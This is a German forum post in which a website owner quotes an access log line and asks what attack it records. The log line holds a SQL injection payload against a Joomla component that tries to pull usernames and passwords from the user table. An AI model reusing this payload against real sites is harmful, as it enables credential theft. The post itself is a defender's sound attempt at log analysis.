Hallo zusammen!
Nun prüfe ich "fast täglich" meine Logfiles, um Aufschluß über die Zugriffe oder evtuelle Hackerangriffe zu bekommen.
Dieser Zugriff fand heute statt. Was bedeutet das, bzw. was wurde da versucht?
Neu ist nun die "username"- und "password" Sache. Wenn ich richtig gehe in der Annahme ist dieser Versuch (was auch immer es war) aufgrund von 404 fehlgeschlagen. Oder?
Die register_globals und allow_open_url sind OFF.Code:xxx.xxx.xx.xx - - [13/Feb/2008:10:57:38 +0100] "GET /index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/* HTTP/1.0" 404 27270 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
Gibt es einen Sammelthread für die Auswertung von Logfiles inkl. ausführlicher Erklärung? Wäre vielleicht recht interessant.


LinkBack URL
About LinkBacks
Zitieren

Lesezeichen